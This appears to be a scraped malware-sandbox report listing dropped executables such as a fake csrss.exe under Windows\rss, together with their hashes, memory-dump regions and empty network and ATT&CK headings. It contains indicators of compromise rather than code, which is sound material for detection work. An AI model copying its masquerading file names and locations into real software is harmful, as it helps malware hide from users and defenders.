e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
f5044df58ed68f39007184ad674f22c6

SHA1
0dedbe5e10878f737990cae5c407d67df98680f6

SHA256
15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35

SHA512
bd1bb50865d5091293dd0c3f7b9876bb737d57ac9840a84a17e5fc00ac7661c26d09fa2600ff6e4e935334207d0e2f85b43764e268c930a6b6a4ef6de7e2141a

Download Submit
\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
f5044df58ed68f39007184ad674f22c6

SHA1
0dedbe5e10878f737990cae5c407d67df98680f6

SHA256
15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35

SHA512
bd1bb50865d5091293dd0c3f7b9876bb737d57ac9840a84a17e5fc00ac7661c26d09fa2600ff6e4e935334207d0e2f85b43764e268c930a6b6a4ef6de7e2141a

Download Submit
memory/600-94-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/600-75-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1372-66-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1372-57-0x00000000026D0000-0x0000000002AC8000-memory.dmp

Filesize
4.0MB

Download
memory/1548-67-0x0000000002970000-0x0000000002D68000-memory.dmp

Filesize
4.0MB

Download
memory/1548-240-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-272-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-263-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-249-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-68-0x0000000002D70000-0x000000000365B000-memory.dmp

Filesize
8.9MB

Download
memory/1548-155-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-95-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-195-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-231-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1548-122-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/1768-230-0x00000000747A0000-0x00000000747CA000-memory.dmp

Filesize
168KB

Download
memory/1768-232-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-224-0x0000000074CC0000-0x0000000074D81000-memory.dmp

Filesize
772KB

Download
memory/1768-273-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-226-0x0000000074C00000-0x0000000074CA0000-memory.dmp

Filesize
640KB

Download
memory/1768-227-0x0000000074BB0000-0x0000000074BFD000-memory.dmp

Filesize
308KB

Download
memory/1768-228-0x00000000748A0000-0x0000000074BA1000-memory.dmp

Filesize
3.0MB

Download
memory/1768-229-0x00000000747D0000-0x0000000074892000-memory.dmp

Filesize
776KB

Download
memory/1768-223-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-187-0x0000000074CC0000-0x0000000074D81000-memory.dmp

Filesize
772KB

Download
memory/1768-225-0x0000000074CA0000-0x0000000074CBE000-memory.dmp

Filesize
120KB

Download
memory/1768-264-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-241-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-189-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-255-0x0000000000D60000-0x00000000011AE000-memory.dmp

Filesize
4.3MB

Download
memory/1768-188-0x00000000747A0000-0x00000000747CA000-memory.dmp

Filesize
168KB

Download
memory/2016-54-0x0000000002810000-0x0000000002C08000-memory.dmp

Filesize
4.0MB

Download
memory/2016-55-0x0000000002C10000-0x00000000034FB000-memory.dmp

Filesize
8.9MB

Download
memory/2016-56-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.